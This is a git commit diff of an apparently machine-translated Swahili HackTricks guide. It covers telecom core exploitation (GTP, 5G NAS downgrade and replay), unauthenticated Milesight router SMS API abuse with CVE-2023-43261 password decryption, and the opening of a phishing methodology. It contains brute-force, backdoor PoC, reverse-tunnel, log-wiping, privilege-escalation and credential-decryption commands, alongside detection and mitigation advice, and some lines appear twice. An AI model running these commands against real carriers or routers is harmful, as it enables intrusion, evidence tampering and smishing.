Translated ['', 'src/generic-methodologies-and-resources/phishing-method

This commit is contained in:
Translator 2025-10-09 00:51:37 +00:00
parent b25d4663a6
commit 269b5f65de
2 changed files with 347 additions and 245 deletions

View File

@ -1,27 +1,27 @@
# Telecom Network Exploitation (GTP / Roaming Environments)
# Utumiaji Mabaya wa Mtandao wa Telecom (GTP / Mazingira ya Roaming)
{{#include ../../banners/hacktricks-training.md}}
> [!NOTE]
> Itifaki za core za simu (GPRS Tunnelling Protocol GTP) mara nyingi hupitia semi-trusted GRX/IPX roaming backbones. Kwa kuwa zinaendeshwa juu ya plain UDP na karibu bila uthibitishaji, **ufikiaji wowote ndani ya mipaka ya telecom mara nyingi unaweza kufikia moja kwa moja signalling planes za core**. Maelezo yafuatayo yanakusanya mbinu za kushambulia zilizoonekana katika mazingira ya vitani dhidi ya SGSN/GGSN, PGW/SGW na nodes nyingine za EPC.
> Itifaki za core za simu (GPRS Tunnelling Protocol GTP) mara nyingi huvuka backbones za roaming za GRX/IPX ambazo hazijo kabisa kuaminika. Kwa kuwa zinabebwa juu ya UDP plain bila karibu uthibitisho wowote, **foothold yoyote ndani ya mpaka la telecom kwa kawaida inaweza kufikia core signalling planes moja kwa moja**. Vidokezo vifuatavyo vinakusanya mbinu za kushambulia zilizoshuhudiwa kwa SGSN/GGSN, PGW/SGW na nodes nyingine za EPC.
## 1. Recon & Initial Access
### 1.1 Default OSS / NE Accounts
Seti kubwa kwa kushangaza ya elementi za mtandao kutoka kwa wauzaji huja na watumiaji waliowekwa imara wa SSH/Telnet kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … wordlist maalum huongeza kwa kiasi kikubwa mafanikio ya brute-force:
Seti kubwa kwa kushangaza ya vipengele vya mtandao vya vendor huja na watumiaji wa SSH/Telnet walio hard-coded kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … wordlist maalum inaongeza kwa kiasi kikubwa mafanikio ya brute-force:
```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```
Ikiwa kifaa kinaonyesha tu management VRF, pivot kupitia jump host kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).
Ikiwa kifaa kinatoa tu VRF ya usimamizi, pivot kupitia jump host kwanza (angalia sehemu «SGSN Emu Tunnel» hapa chini).
### 1.2 Ugundaji wa Host ndani ya GRX/IPX
Wengi wa operatori wa GRX bado wanaruhusu **ICMP echo** kupita kwenye backbone. Changanya `masscan` na probes za UDP zilizojengwa `gtpv1` ili kwa haraka ramani ya GTP-C listeners:
### 1.2 Host Discovery ndani ya GRX/IPX
Waendeshaji wengi wa GRX bado wanaruhusu **ICMP echo** kupitia backbone. Changanya `masscan` na `gtpv1` UDP probes zilizojengwa ndani ili kuunda ramani kwa haraka ya GTP-C listeners:
```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```
## 2. Kuorodhesha Abonati `cordscan`
## 2. Kuorodhesha Wateja `cordscan`
Chombo cha Go kilicho hapa kinatengeneza vifurushi vya **GTP-C Create PDP Context Request** na kurekodi majibu. Kila jibu linafunua **SGSN / MME** ya sasa inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na abonati.
Chombo cha Go kilicho hapa kinaunda vifurushi vya **GTP-C Create PDP Context Request** na kinaweka kumbukumbu za majibu. Kila jibu linafunua **SGSN / MME** inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja.
```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
@ -30,21 +30,21 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```
Bendera muhimu:
- `--imsi` IMSI ya mteja lengwa
- `--imsi` IMSI ya mteja anayelengwa
- `--oper` Home / HNI (MCC+MNC)
- `-w` Andika paketi ghafi kwenye pcap
- `-w` Andika vifurushi mbichi kwenye pcap
Konstanti muhimu ndani ya binary zinaweza kubadilishwa ili kupanua skani:
Konstanti muhimu ndani ya binary zinaweza kupachikwa ili kupanua scans:
```
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
```
## 3. Utekelezaji wa Msimbo kupitia GTP `GTPDoor`
## 3. Utekelezaji wa Msimbo juu ya GTP `GTPDoor`
`GTPDoor` ni huduma ndogo ya ELF ambayo **binds UDP 2123 and parses every incoming GTP-C packet**. Wakati payload inaanza na pre-shared tag, sehemu iliyobaki ina-decrypted (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr hu-exfiltrate ndani ya ujumbe za **Echo Response** ili hakuna outward session kamwe isiundwe.
`GTPDoor` ni huduma ndogo ya ELF ambayo inasikiliza kwenye UDP 2123 na inachambua kila GTP-C packet inayokuja. Wakati payload inaanza na tag iliyoshirikiwa awali, sehemu iliyosalia inafumbuliwa (AES-128-CBC) na inatekelezwa kupitia `/bin/sh -c`. stdout/stderr zinexfiltrated ndani ya ujumbe za **Echo Response** ili hakuna session ya nje itakayoundwa.
Minimal PoC packet (Python):
Paketi ya PoC ndogo (Python):
```python
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
@ -52,40 +52,40 @@ cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```
Ugunduzi:
* yoyote mwenyeji anayetuma **unbalanced Echo Requests** kwa anwani za IP za SGSN
Detection:
* mashine yoyote inayotuma **unbalanced Echo Requests** kwa IP za SGSN
* bendera ya toleo la GTP imewekwa kwa 1 wakati aina ya ujumbe = 1 (Echo) utofauti na spec
## 4. Pivoting Through the Core
### 4.1 `sgsnemu` + SOCKS5
`OsmoGGSN` inakuja na emulator ya SGSN inayoweza **kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi**. Baada ya kukubaliana, Linux hupokea interface mpya `tun0` inayoweza kufikiwa kutoka kwa roaming peer.
`OsmoGGSN` inaambatisha emulator ya SGSN inayoweza **kuanzisha PDP context kuelekea GGSN/PGW halisi**. Mara mazungumzo yanapokamilika, Linux inapokea kiolesura kipya `tun0` kinachoweza kufikiwa kutoka kwa mwenza wa roaming.
```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy
```
Kwa hair-pinning sahihi ya firewall, tundu hili linapita kando ya signalling-only VLANs na linakupeleka moja kwa moja kwenye **safu ya data**.
Kwa firewall hair-pinning inayofaa, tuneli hii inapita kando ya signalling-only VLANs na inakupeleka moja kwa moja kwenye **data plane**.
### 4.2 SSH Reverse Tunnel over Port 53
DNS huwa wazi karibu kila mara katika miundombinu za roaming. Fungua huduma ya ndani ya SSH kwenye VPS yako ikisikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
DNS karibu kila mara huwa wazi katika miundombinu ya roaming. Fungua huduma ya ndani ya SSH kwenye VPS yako inayosikiliza kwenye :53 kisha rudi baadaye kutoka nyumbani:
```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```
Hakikisha kwamba `GatewayPorts yes` imewezeshwa kwenye VPS.
Thibitisha kwamba `GatewayPorts yes` imewezeshwa kwenye VPS.
## 5. Covert Channels
## 5. Njia za siri
| Channel | Transport | Decoding | Notes |
| Chaneli | Usafirishaji | Ufasiri | Maelezo |
|---------|-----------|----------|-------|
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji wa kimyakimya kabisa, hakuna trafiki ya kutoka |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | inatazama `*.nodep` sub-domain |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inaingiliana na mazungumzo halali ya GTP-C chatter |
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikilizaji wa kimya kabisa, hakuna trafiki ya kutoka |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | huangalia sub-domain `*.nodep` |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inajumuika na mazungumzo halali ya GTP-C chatter |
All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
Implants zote zinaweka watchdogs ambazo **timestomp** binaries zao na re-spawn ikiwa zimeanguka.
## 6. Defense Evasion Cheatsheet
## 6. Muhtasari wa Kuepukana na Ulinzi
```bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
@ -111,79 +111,79 @@ python3 PwnKit.py
# Sudo Baron Samedit CVE-2021-3156
python3 exploit_userspec.py
```
Dokezo la kusafisha:
Ushauri wa usafishaji:
```bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
```
## 8. Zana
## 8. Tool Box
* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` custom tooling described in previous sections.
* `FScan` : msako wa TCP kwenye intranet (`fscan -p 22,80,443 10.0.0.0/24`)
* `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
* `Responder` : LLMNR/NBT-NS rogue WPAD
* `Microsocks` + `ProxyChains` : pivoting nyepesi ya SOCKS5
* `FRP` (≥0.37) : traversal ya NAT / kuunganisha asset
* `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting
* `FRP` (≥0.37) : NAT traversal / asset bridging
## 9. Mashambulizi ya Usajili wa 5G NAS: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay
Mchakato wa usajili wa 5G unaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS uanzishwe kwa Security Mode Command/Complete, ujumbe za awali hazijathibitishwa wala hazijafichwa. Dirisha hili kabla ya usalama huruhusu njia mbalimbali za mashambulizi wakati unaweza kuangalia au kuharibu trafiki ya N2 (mf., on-path ndani ya core, rogue gNB, au testbed).
Mchakato wa registration wa 5G unaendeshwa juu ya NAS (Non-Access Stratum) juu ya NGAP. Hadi usalama wa NAS hauwashwi kwa Security Mode Command/Complete, ujumbe za awali hazijathibitishwa na hazijaencrypt. Dirisha hili la kabla ya usalama linawezesha njia nyingi za attack wakati unaweza kuangalia au kubadilisha trafiki ya N2 (mfano, on-path ndani ya core, rogue gNB, au testbed).
Mtiririko wa usajili (imefupishwa):
- Registration Request: UE inatuma SUCI (SUPI iliyofichwa) na capabilities.
- Authentication: AMF/AUSF inatuma RAND/AUTN; UE inarejesha RES*.
- Security Mode Command/Complete: NAS integrity na ciphering vinajadiliwa na kuanzishwa.
- PDU Session Establishment: usanidi wa IP/QoS.
Registration flow (simplified):
- Registration Request: UE inatuma SUCI (SUPI iliyosimbwa na home-network public key) na capabilities.
- Authentication: AMF/AUSF wanatuma RAND/AUTN; UE inarejesha RES*.
- Security Mode Command/Complete: integrity na ciphering za NAS zinajadiliwa na kuanzishwa.
- PDU Session Establishment: setup ya IP/QoS.
Vidokezo vya usanidi wa maabara (si-RF):
- Core: Open5GS default deployment inatosha kuzalisha mtiririko.
- UE: simulator au UE ya majaribio; decode kwa kutumia Wireshark.
Lab setup tips (non-RF):
- Core: Open5GS default deployment inatosha kuzalisha flows.
- UE: simulator au test UE; decode kwa kutumia Wireshark.
- Active tooling: 5GReplay (capture/modify/replay NAS within NGAP), Sni5Gect (sniff/patch/inject NAS on the fly without bringing up a full rogue gNB).
- Filters muhimu za kuonyesha katika Wireshark:
- Useful display filters in Wireshark:
- ngap.procedure_code == 15 (InitialUEMessage)
- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)
### 9.1 Faragha ya kitambulisho: SUCI failures exposing SUPI/IMSI
Inatarajiwa: UE/USIM lazima itume SUCI (SUPI iliyofichwa kwa funguo za umma za mtandao wa nyumbani). Kupata SUPI/IMSI wazi ndani ya Registration Request inaonyesha dosari ya faragha inayowezesha kufuatilia mteja kwa muda mrefu.
### 9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI
Inayotarajiwa: UE/USIM lazima itume SUCI (SUPI iliyosimbwa na home-network public key). Kupata SUPI/IMSI kwa plaintext ndani ya Registration Request kunaonyesha hitilafu ya privacy inayoruhusu tracking ya subscriber kwa muda mrefu.
Jinsi ya kujaribu:
- Kamata ujumbe wa kwanza wa NAS katika InitialUEMessage na chunguza Mobile Identity IE.
- Ukaguzi wa haraka kwenye Wireshark:
- Inapaswa ku-decode kama SUCI, sio IMSI.
- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` inapaswa kuwepo; kutokuwepo pamoja na uwepo wa `imsi` kunaonyesha kuvuja.
- Capture ujumbe wa kwanza wa NAS katika InitialUEMessage na inspect Mobile Identity IE.
- Wireshark quick checks:
- Inapaswa kudecode kama SUCI, sio IMSI.
- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` should exist; absence plus presence of `imsi` indicates leakage.
Nini kukusanya:
- MCC/MNC/MSIN ikiwa imetolewa; rejea kwa kila-UE na fuatilia kwa muda/mahali.
Kitu cha kukusanya:
- MCC/MNC/MSIN ikiwa imefunuliwa; log kwa kila-UE na track kwa wakati/mahali.
Kupunguza:
- Lazimisha UEs/USIMs zenye SUCI pekee; toa tahadhari juu ya IMSI/SUPI yoyote katika NAS ya mwanzo.
Mitigation:
- Lete enforcement ya SUCI-only UEs/USIMs; toa alert juu ya IMSI/SUPI yoyote katika initial NAS.
### 9.2 Kupunguza uwezo (capability bidding-down) hadi algoritmu tupu (EEA0/EIA0)
Mandhari:
- UE inatangaza EEA (encryption) na EIA (integrity) zinazotunukiwa katika UE Security Capability IE ya Registration Request.
- Ramani za kawaida: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni algoritmu tupu (null).
### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0)
Background:
- UE inatangaza EEA (encryption) na EIA (integrity) zinazotambuliwa katika UE Security Capability IE ya Registration Request.
- Common mappings: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 ni null algorithms.
Tatizo:
- Kwa sababu Registration Request haijalindwa kwa integriti, mshambuliaji aliye on-path anaweza kufuta bits za capability ili kulazimisha uchaguzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks kwa makosa huruhusu algoritmu tupu nje ya huduma za dharura.
Issue:
- Kwa sababu Registration Request haina integrity protection, on-path attacker anaweza kufuta capability bits ili kulazimisha uchaguzi wa EEA0/EIA0 baadaye wakati wa Security Mode Command. Baadhi ya stacks zinakubali vibaya null algorithms hata nje ya huduma za dharura.
Hatua za kushambulia:
- Intercept InitialUEMessage na badilisha NAS UE Security Capability ili kutangaza tu EEA0/EIA0.
- Kwa Sni5Gect, hook ujumbe wa NAS na patch bits za capability kabla ya kuendelea.
Offensive steps:
- Intercept InitialUEMessage na modify NAS UE Security Capability ili itangaze tu EEA0/EIA0.
- Kwa Sni5Gect, hook ujumbe wa NAS na patch capability bits kabla ya kuendelea mbele.
- Angalia kama AMF inakubali null ciphers/integrity na inakamilisha Security Mode kwa EEA0/EIA0.
Uhakiki/uwazi:
- Katika Wireshark, thibitisha algoritmu zilizochaguliwa baada ya Security Mode Command/Complete.
- Mfano wa output ya passive sniffer:
Verification/visibility:
- Katika Wireshark, thibitisha algorithms zilizochaguliwa baada ya Security Mode Command/Complete.
- Example passive sniffer output:
```
Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001
```
Mikakati (zinazohitajika):
- Sanidi AMF/policy kukataa EEA0/EIA0 isipokuwa pale inapotakiwa kwa lazima (kwa mfano, simu za dharura).
- Pendelea kutekeleza EEA2/EIA2 kama kiwango cha chini; rekodi na toa alarm kwa muktadha wowote wa usalama wa NAS unaojadiliana kuhusu null algorithms.
Marekebisho (yanayohitajika):
- Sanidi AMF/policy kukataa EEA0/EIA0 isipokuwa pale panapobidiwa kwa ukali (kwa mfano, simu za dharura).
- Pendelea kutekeleza EEA2/EIA2 angalau; rekodi na toa tahadhari kwa muktadha wowote wa usalama wa NAS unaojadiliana null algorithms.
### 9.3 Replay ya initial Registration Request (pre-security NAS)
Kwa sababu initial NAS haina uadilifu na freshness, InitialUEMessage+Registration Request iliyokamatwa inaweza kureplayed kwa AMF.
### 9.3 Replay of initial Registration Request (pre-security NAS)
Kwa sababu NAS ya awali haina uadilifu na freshness, InitialUEMessage+Registration Request zilizokamatwa zinaweza ku-replay kwa AMF.
PoC rule for 5GReplay to forward matching replays:
```xml
@ -208,34 +208,105 @@ boolean_expression="nas_5g.message_type == 65"/>
</property>
</beginning>
```
Kitu cha kuangalia:
- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa uhakiki wa uhalisia au wa muktadha unaonyesha hatari.
What to observe:
- Whether AMF accepts the replay and proceeds to Authentication; lack of freshness/context validation indicates exposure.
- Je, AMF inakubali replay na kuendelea na Authentication; ukosefu wa uhakiki wa freshness au binding ya muktadha unaashiria udhaifu.
Marekebisho:
- Lazimisha replay protection/context binding kwenye AMF; rate-limit na correlate kwa kila GNB/UE.
Mitigations:
- Enforce replay protection/context binding at AMF; rate-limit and correlate per-GNB/UE.
- Tekeleza ulinzi dhidi ya replay na binding ya muktadha kwenye AMF; weka rate-limiting na uoanishaji kwa kila GNB/UE.
### 9.4 Vidokezo vya zana (inayoweza kurudiwa)
- Open5GS: anzisha AMF/SMF/UPF kuiga core; tazama N2 (NGAP) na NAS.
- Wireshark: thibitisha ufasiri wa NGAP/NAS; tumia filters zilizo juu ili kutenganisha Registration.
- 5GReplay: rekodi registration, kisha replay ujumbe maalum za NGAP + NAS kama sheria inavyoeleza.
- Sni5Gect: sniff/modify/inject NAS control-plane kwa moja kwa moja ili kulazimisha null algorithms au kuingilia authentication sequences.
### 9.4 Tooling pointers (reproducible)
- Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS.
- Open5GS: anzisha AMF/SMF/UPF ili kughushi core; angalia N2 (NGAP) na NAS.
- Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
- Wireshark: thibitisha decodes za NGAP/NAS; tumia vichujio vilivyo hapo juu kutenganisha Registration.
- 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
- 5GReplay: rekodi Registration, kisha replay ujumbe maalum za NGAP + NAS kama ilivyoelezwa.
- Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.
- Sni5Gect: sniff/modify/inject kwa wakati halisi kwenye NAS control-plane ili kulazimisha null algorithms au kuyumbisha mfululizo wa authentication.
### 9.5 Orodha ya ulinzi
- Endelea kuchunguza Registration Request kwa plaintext SUPI/IMSI; zuia vifaa/USIMs vinavyokiuka.
- Kataa EEA0/EIA0 isipokuwa kwa taratibu za dharura zilizobainishwa kwa ukomo; hitaji angalau EEA2/EIA2.
- Gundua miundombinu haribifu au iliyopangwa vibaya: unauthorized gNB/AMF, unexpected N2 peers.
- Toa onyo kuhusu NAS security modes zinazosababisha null algorithms au replay mara kwa mara ya InitialUEMessage.
### 9.5 Defensive checklist
- Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs.
- Endelea kukagua Registration Request kwa SUPI/IMSI za plain text; zuia vifaa/USIMs vinavyokiuka.
- Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
- Kataa EEA0/EIA0 isipokuwa kwa taratibu za dharura zilizoainishwa kwa undani mdogo; hitaji angalau EEA2/EIA2.
- Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
- Tambua miundombinu ya rogue au iliyosanidiwa vibaya: gNB/AMF zisizoidhinishwa, N2 peers zisizotarajiwa.
- Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.
- Toa onyo kwa NAS security modes zinazosababisha null algorithms au replay za mara kwa mara za InitialUEMessage.
---
## Mawazo ya Ugunduzi
1. **Kifaa chochote isipokuwa SGSN/GGSN kinachounda Create PDP Context Requests**.
2. **Porti zisizo za kawaida (53, 80, 443) zinapokea SSH handshakes** kutoka IP za ndani.
3. **Echo Requests mara kwa mara bila Echo Responses zinazolingana** inaweza kuonyesha GTPDoor beacons.
4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply iliyo na uwanja mkubwa wa identifier/sequence usio sifuri**.
5. 5G: **InitialUEMessage inayobeba NAS Registration Requests zinazorudiwa kutoka vituo sawa** (ishara ya replay).
6. 5G: **NAS Security Mode inayojadili EEA0/EIA0** nje ya muktadha wa dharura.
## Marejeo
## 10. Industrial Cellular Routers Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)
Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPCstyle endpoint at `/cgi`. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS.
- Matumizi mabaya ya web APIs zilizo wazi za routers za cellular za viwandani yanawezesha smishing ya chanzo cha carrier kwa siri na kwa wingi. Routers za mfululizo wa Milesight UR zinaonyesha endpoint ya mtindo wa JSON-RPC kwenye `/cgi`. Wakati zinaposanidiwa vibaya, API inaweza kuhojiwa bila uthibitisho ili kuorodhesha SMS inbox/outbox na, katika baadhi ya usanidi, kutuma SMS.
Typical unauthenticated requests (same structure for inbox/outbox):
- Maombi ya kawaida yasiyo na uthibitisho (muundo ule ule kwa inbox/outbox):
```http
POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json
{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }
```
```json
{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }
```
Majibu yanajumuisha mashamba kama `timestamp`, `content`, `phone_number` (E.164), na `status` (`success` or `failed`). Kutumwa kwa `failed` mara kwa mara kwa nambari ile ile mara nyingi ni attacker “capability checks” ili kuthibitisha kuwa router/SIM inaweza kuwasilisha kabla ya blasting.
Mfano wa curl ku-exfiltrate SMS metadata:
```bash
curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'
```
Vidokezo kuhusu auth artifacts:
- Baadhi ya trafiki inaweza kujumuisha auth cookie, lakini sehemu kubwa ya vifaa vilivyo wazi huwajibu bila authentication kwa `query_inbox`/`query_outbox` wakati management interface iko Internet-facing.
- Kwenye mazingira yanayohitaji auth, previously-leaked credentials (tazama chini) hurudisha access.
Credential recovery path CVE-2023-43261:
- Familia zilizoathiriwa: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
- Tatizo: web-served logs (e.g., `httpd.log`) zinapatikana unauthenticated chini ya `/lang/log/` na zina admin login events zenye password iliyo encrypted kwa kutumia hardcoded AES key/IV iliyopo client-side JavaScript.
- Practical access and decrypt:
```bash
curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}
```
Mfano mdogo wa Python kwa decrypt leaked passwords (AES-128-CBC, hardcoded key/IV):
```python
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...' # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())
```
Mawazo ya kuwinda na kugundua (mtandao):
- Toa onyo kwa `POST /cgi` zisizothibitishwa ambazo mwili wa JSON una `base`/`function` umewekwa kuwa `query_inbox` au `query_outbox`.
- Fuata milipuko ya `POST /cgi` zinazojirudia zikifuatiwa na vigezo `status":"failed"` kwenye nambari nyingi za kipekee kutoka IP moja ya chanzo (capability testing).
- Fanya inventari ya Milesight routers zinazoweza kupatikana kutoka Internet; zuia usimamizi kwa VPN; zima vipengele vya SMS isipohitajika; sasisha hadi ≥ v35.3.0.7; rotate credentials na kagua SMS logs kwa unknown sends.
Shodan/OSINT pivots (mifano yaliyoshuhudiwa porini):
- `http.html:"rt_title"` inafanana na paneli za Milesight router.
- Google dorking kwa exposed logs: `"/lang/log/system" ext:log`.
Athari za kiutendaji: kutumia SIM halali za carrier ndani ya router kunatoa SMS deliverability/credibility ya juu sana kwa phishing, wakati inbox/outbox exposure leaks sensitive metadata at scale.
---
## Mawazo ya Ugunduzi
1. **Kifaa chochote isipokuwa SGSN/GGSN kinachoitisha Create PDP Context Requests**.
2. **Ports zisizo za kawaida (53, 80, 443) zikipokea SSH handshakes** kutoka IP za ndani.
3. **Echo Requests mara nyingi bila Echo Responses zinazolingana** inaweza kuashiria GTPDoor beacons.
4. **Kiwango kikubwa cha trafiki ya ICMP echo-reply yenye identifier/sequence kubwa, zisizo sifuri**.
5. 5G: **InitialUEMessage inayobeba NAS Registration Requests zinazorudiwa kutoka endpoints sawa** (replay signal).
6. 5G: **NAS Security Mode ikijadili EEA0/EIA0** nje ya muktadha wa dharura.
## References
- [Palo Alto Unit42 Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 GPRS Tunnelling Protocol (v16.4.0)
@ -243,5 +314,8 @@ Marekebisho:
- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol)
- 3GPP TS 24.501 Non-Access-Stratum (NAS) protocol for 5GS
- 3GPP TS 33.501 Security architecture and procedures for 5G System
- [Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)](https://blog.sekoia.io/silent-smishing-the-hidden-abuse-of-cellular-router-apis/)
- [CVE-2023-43261 NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-43261)
- [CVE-2023-43261 PoC (win3zz)](https://github.com/win3zz/CVE-2023-43261)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -1,43 +1,43 @@
# Mbinu za Phishing
# Phishing Methodology
{{#include ../../banners/hacktricks-training.md}}
## Mbinu
1. Fanya recon kwa victim
1. Chagua the **victim domain**.
2. Fanya web enumeration ya msingi ukitafuta **login portals** zinazotumika na victim na **amua** ni ipi utakayo **impersonate**.
3. Tumia **OSINT** ili **find emails**.
2. Andaa mazingira
1. **Buy the domain** utakaotumia kwa phishing assessment
1. Recon the victim
1. Select the **victim domain**.
2. Perform some basic web enumeration **searching for login portals** used by the victim and **decide** which one you will **impersonate**.
3. Use some **OSINT** to **find emails**.
2. Prepare the environment
1. **Buy the domain** you are going to use for the phishing assessment
2. **Configure the email service** related records (SPF, DMARC, DKIM, rDNS)
3. Sanidi VPS na **gophish**
3. Andaa campaign
1. Andaa **email template**
2. Andaa **web page** ya kuiba credentials
3. Configure the VPS with **gophish**
3. Prepare the campaign
1. Prepare the **email template**
2. Prepare the **web page** to steal the credentials
4. Launch the campaign!
## Generate similar domain names or buy a trusted domain
### Mbinu za mabadiliko ya domain
### Domain Name Variation Techniques
- **Keyword**: Jina la domain linajumuisha keyword muhimu la domain ya asili (mfano, zelster.com-management.com).
- **hypened subdomain**: Badilisha dot kwa hyphen ya subdomain (mfano, www-zelster.com).
- **New TLD**: Ipi domain ile ile ukitumia New TLD (mfano, zelster.org)
- **Homoglyph**: Inabadilisha herufi katika jina la domain kwa herufi zinazofanana kwa muonekano (mfano, zelfser.com).
- **Keyword**: Jina la domain linajumuisha neno muhimu la domain ya asili (mfano, zelster.com-management.com).
- **hypened subdomain**: Badilisha **dot kwa hyphen** katika subdomain (mfano, www-zelster.com).
- **New TLD**: Tumia domain ile ile lakini na **TLD mpya** (mfano, zelster.org)
- **Homoglyph**: Inabadilisha herufi katika jina la domain kwa **herufi zinazofanana kwa muonekano** (mfano, zelfser.com).
{{#ref}}
homograph-attacks.md
{{#endref}}
- **Transposition:** Inabadilisha nafasi za herufi mbili ndani ya jina la domain (mfano, zelsetr.com).
- **Singularization/Pluralization**: Inaongeza au kuondoa "s" mwishoni mwa jina la domain (mfano, zeltsers.com).
- **Transposition:** Inabadilisha **nchi mbili za herufi** ndani ya jina la domain (mfano, zelsetr.com).
- **Singularization/Pluralization**: Inaongeza au kuondoa “s” mwishoni mwa jina la domain (mfano, zeltsers.com).
- **Omission**: Inaondoa moja ya herufi kutoka jina la domain (mfano, zelser.com).
- **Repetition:** Inarudia moja ya herufi ndani ya jina la domain (mfano, zeltsser.com).
- **Replacement**: Kama homoglyph lakini isiyo na stealth nyingi. Inabadilisha moja ya herufi katika jina la domain, labda kwa herufi ambayo iko karibu kwenye keyboard (mfano, zektser.com).
- **Subdomained**: Ingiza dot ndani ya jina la domain (mfano, ze.lster.com).
- **Insertion**: Inaingiza herufi katika jina la domain (mfano, zerltser.com).
- **Missing dot**: Ambatanisha TLD kwa jina la domain. (mfano, zelstercom.com)
- **Repetition:** Inarudia moja ya herufi kwenye jina la domain (mfano, zeltsser.com).
- **Replacement**: Kama homoglyph lakini isiyo ya kimkakati. Inabadilisha moja ya herufi kwenye jina la domain, labda kwa herufi iliyo karibu kwenye keyboard (mfano, zektser.com).
